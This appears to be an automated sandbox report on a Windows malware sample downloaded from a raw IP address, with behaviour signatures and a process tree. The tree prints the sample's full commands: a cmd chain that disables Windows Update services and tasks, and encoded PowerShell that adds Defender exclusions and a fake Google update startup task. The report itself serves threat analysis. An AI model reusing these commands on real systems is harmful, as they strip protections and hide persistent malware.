Resubmissions
02-09-2022 20:06
220902-yvgf4abefr 1002-09-2022 20:04
220902-ytk3wseca6 1002-09-2022 20:03
220902-ys52nsbedn 1002-09-2022 19:55
220902-ynenxseba3 1002-09-2022 19:49
220902-yj5pjseac3 1002-09-2022 18:42
220902-xclsesdbc6 10Analysis
-
max time kernel
53s -
max time network
80s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
02-09-2022 20:06
Static task
static1
URLScan task
urlscan1
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
EdEYMrpFBNbTRHo.exepid process 2204 EdEYMrpFBNbTRHo.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 3580 takeown.exe 4632 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
EdEYMrpFBNbTRHo.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation EdEYMrpFBNbTRHo.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 3580 takeown.exe 4632 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 18 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
EdEYMrpFBNbTRHo.exedescription pid process target process PID 2204 set thread context of 4676 2204 EdEYMrpFBNbTRHo.exe conhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
conhost.exedescription ioc process File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 832 sc.exe 3452 sc.exe 3536 sc.exe 3344 sc.exe 3524 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\PhishingFilter iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 89be75672cbed801 iexplore.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\RepId iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{B64FFB80-2AFA-11ED-A0EE-4A7057C3C021} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2329031507" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30981895" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d79060000000002000000000010660000000100002000000013ede67e477b554dc749a1a03bcddf634c7539a2210afa14fbfddfc474f823cf000000000e8000000002000020000000b08374667bdeac3730a944c39432e146573a967e3d3beb1000fdc9e8e9075af32000000046479f02a9fb9243e8856ff1191f48b4792ba2c908f92296cca66bc25670806f400000005119b0eb616ea9191d521f452aa038f48d21a15988fcd78eb74a4a4986e36bd5843727fffbf2719b9603a72db3f6cbbc0339339072b13ac2ef57978169519ec2 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60442d8d07bfd801 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2329031507" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{6668BE0E-CE96-48F3-BEB9-6436C4BE9CC5}" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30981895" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2348875470" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d7906000000000200000000001066000000010000200000001a1ab193588f143fddd6c4194ae49f975a56a97cb63c2cdaba1dd70b3f7f647c000000000e8000000002000020000000be79589336b39d2f0d068d0629be929d52d32b9b9e4262f244002733dafaae7f200000004ac2a04c67c0460571ab87e7239c5c6698816d2aed9a6a651f8b7549bbaa33d6400000001f33e9af1592c3cda83da4f7c1c09a0941299603107e10db758fb747dc671a2748505261e10e10912d1603edcaa62e97e6149457eaf7b8e9ff619470836c5c8a iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30981895" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 3057408d07bfd801 iexplore.exe -
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1380 reg.exe 2860 reg.exe 1752 reg.exe 4152 reg.exe 376 reg.exe 3896 reg.exe 5028 reg.exe 4304 reg.exe 2304 reg.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeEdEYMrpFBNbTRHo.exepowershell.exepid process 3108 powershell.exe 3108 powershell.exe 2204 EdEYMrpFBNbTRHo.exe 2508 powershell.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
powershell.exeEdEYMrpFBNbTRHo.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 3108 powershell.exe Token: SeDebugPrivilege 2204 EdEYMrpFBNbTRHo.exe Token: SeShutdownPrivilege 3696 powercfg.exe Token: SeCreatePagefilePrivilege 3696 powercfg.exe Token: SeShutdownPrivilege 3720 powercfg.exe Token: SeCreatePagefilePrivilege 3720 powercfg.exe Token: SeShutdownPrivilege 4928 powercfg.exe Token: SeCreatePagefilePrivilege 4928 powercfg.exe Token: SeShutdownPrivilege 1360 powercfg.exe Token: SeCreatePagefilePrivilege 1360 powercfg.exe Token: SeTakeOwnershipPrivilege 3580 takeown.exe Token: SeDebugPrivilege 2508 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
iexplore.exepid process 3456 iexplore.exe 3456 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 3456 iexplore.exe 3456 iexplore.exe 5024 IEXPLORE.EXE 5024 IEXPLORE.EXE 5024 IEXPLORE.EXE 5024 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
iexplore.exeEdEYMrpFBNbTRHo.execmd.execmd.exedescription pid process target process PID 3456 wrote to memory of 5024 3456 iexplore.exe IEXPLORE.EXE PID 3456 wrote to memory of 5024 3456 iexplore.exe IEXPLORE.EXE PID 3456 wrote to memory of 5024 3456 iexplore.exe IEXPLORE.EXE PID 3456 wrote to memory of 2204 3456 iexplore.exe EdEYMrpFBNbTRHo.exe PID 3456 wrote to memory of 2204 3456 iexplore.exe EdEYMrpFBNbTRHo.exe PID 2204 wrote to memory of 3108 2204 EdEYMrpFBNbTRHo.exe powershell.exe PID 2204 wrote to memory of 3108 2204 EdEYMrpFBNbTRHo.exe powershell.exe PID 2204 wrote to memory of 4272 2204 EdEYMrpFBNbTRHo.exe cmd.exe PID 2204 wrote to memory of 4272 2204 EdEYMrpFBNbTRHo.exe cmd.exe PID 2204 wrote to memory of 4260 2204 EdEYMrpFBNbTRHo.exe cmd.exe PID 2204 wrote to memory of 4260 2204 EdEYMrpFBNbTRHo.exe cmd.exe PID 4272 wrote to memory of 832 4272 cmd.exe sc.exe PID 4272 wrote to memory of 832 4272 cmd.exe sc.exe PID 4260 wrote to memory of 3696 4260 cmd.exe powercfg.exe PID 4260 wrote to memory of 3696 4260 cmd.exe powercfg.exe PID 4272 wrote to memory of 3452 4272 cmd.exe sc.exe PID 4272 wrote to memory of 3452 4272 cmd.exe sc.exe PID 4272 wrote to memory of 3536 4272 cmd.exe sc.exe PID 4272 wrote to memory of 3536 4272 cmd.exe sc.exe PID 4260 wrote to memory of 3720 4260 cmd.exe powercfg.exe PID 4260 wrote to memory of 3720 4260 cmd.exe powercfg.exe PID 4272 wrote to memory of 3344 4272 cmd.exe sc.exe PID 4272 wrote to memory of 3344 4272 cmd.exe sc.exe PID 4260 wrote to memory of 4928 4260 cmd.exe powercfg.exe PID 4260 wrote to memory of 4928 4260 cmd.exe powercfg.exe PID 4272 wrote to memory of 3524 4272 cmd.exe sc.exe PID 4272 wrote to memory of 3524 4272 cmd.exe sc.exe PID 4260 wrote to memory of 1360 4260 cmd.exe powercfg.exe PID 4260 wrote to memory of 1360 4260 cmd.exe powercfg.exe PID 4272 wrote to memory of 1380 4272 cmd.exe reg.exe PID 4272 wrote to memory of 1380 4272 cmd.exe reg.exe PID 4272 wrote to memory of 4152 4272 cmd.exe reg.exe PID 4272 wrote to memory of 4152 4272 cmd.exe reg.exe PID 4272 wrote to memory of 2860 4272 cmd.exe reg.exe PID 4272 wrote to memory of 2860 4272 cmd.exe reg.exe PID 4272 wrote to memory of 376 4272 cmd.exe reg.exe PID 4272 wrote to memory of 376 4272 cmd.exe reg.exe PID 4272 wrote to memory of 3896 4272 cmd.exe reg.exe PID 4272 wrote to memory of 3896 4272 cmd.exe reg.exe PID 4272 wrote to memory of 3580 4272 cmd.exe takeown.exe PID 4272 wrote to memory of 3580 4272 cmd.exe takeown.exe PID 4272 wrote to memory of 4632 4272 cmd.exe icacls.exe PID 4272 wrote to memory of 4632 4272 cmd.exe icacls.exe PID 4272 wrote to memory of 5028 4272 cmd.exe reg.exe PID 4272 wrote to memory of 5028 4272 cmd.exe reg.exe PID 4272 wrote to memory of 4304 4272 cmd.exe reg.exe PID 4272 wrote to memory of 4304 4272 cmd.exe reg.exe PID 4272 wrote to memory of 1752 4272 cmd.exe reg.exe PID 4272 wrote to memory of 1752 4272 cmd.exe reg.exe PID 4272 wrote to memory of 2304 4272 cmd.exe reg.exe PID 4272 wrote to memory of 2304 4272 cmd.exe reg.exe PID 4272 wrote to memory of 1060 4272 cmd.exe schtasks.exe PID 4272 wrote to memory of 1060 4272 cmd.exe schtasks.exe PID 4272 wrote to memory of 2256 4272 cmd.exe schtasks.exe PID 4272 wrote to memory of 2256 4272 cmd.exe schtasks.exe PID 4272 wrote to memory of 5100 4272 cmd.exe schtasks.exe PID 4272 wrote to memory of 5100 4272 cmd.exe schtasks.exe PID 4272 wrote to memory of 3844 4272 cmd.exe schtasks.exe PID 4272 wrote to memory of 3844 4272 cmd.exe schtasks.exe PID 4272 wrote to memory of 4328 4272 cmd.exe schtasks.exe PID 4272 wrote to memory of 4328 4272 cmd.exe schtasks.exe PID 4272 wrote to memory of 3688 4272 cmd.exe schtasks.exe PID 4272 wrote to memory of 3688 4272 cmd.exe schtasks.exe PID 4272 wrote to memory of 4784 4272 cmd.exe schtasks.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://81.161.229.110/htdocs/1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3456 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Downloads\EdEYMrpFBNbTRHo.exe"C:\Users\Admin\Downloads\EdEYMrpFBNbTRHo.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAYgByAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBtAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwB4AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBpAHcAdwAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAbQB5AHcAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEARwBVAEEAYwB3AEIAcwBBAEMATQBBAFAAZwBBAGcAQQBGAE0AQQBkAEEAQgBoAEEASABJAEEAZABBAEEAdABBAEYAQQBBAGMAZwBCAHYAQQBHAE0AQQBaAFEAQgB6AEEASABNAEEASQBBAEEAdABBAEUAWQBBAGEAUQBCAHMAQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAZwBBAEMAYwBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBBAGcAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEAYwB3AEIAYwBBAEUAYwBBAGIAdwBCAHYAQQBHAGMAQQBiAEEAQgBsAEEARgB3AEEAUQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBYAEEAQgAxAEEASABBAEEAWgBBAEIAaABBAEgAUQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGwAQQBIAEkAQQBZAGcAQQBnAEEARgBJAEEAZABRAEIAdQBBAEUARQBBAGMAdwBBAGcAQQBEAHcAQQBJAHcAQgB4AEEARwBVAEEASQB3AEEAKwBBAEEAPQA9ACIAJwApACAAPAAjAGYAcgAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAGMAawBrACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAeAB4ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdgB2AGUAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwARABvAHcAbgBsAG8AYQBkAHMAXABFAGQARQBZAE0AcgBwAEYAQgBOAGIAVABSAEgAbwAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGkAeQBiAHoAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAGgAYwBiAHgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
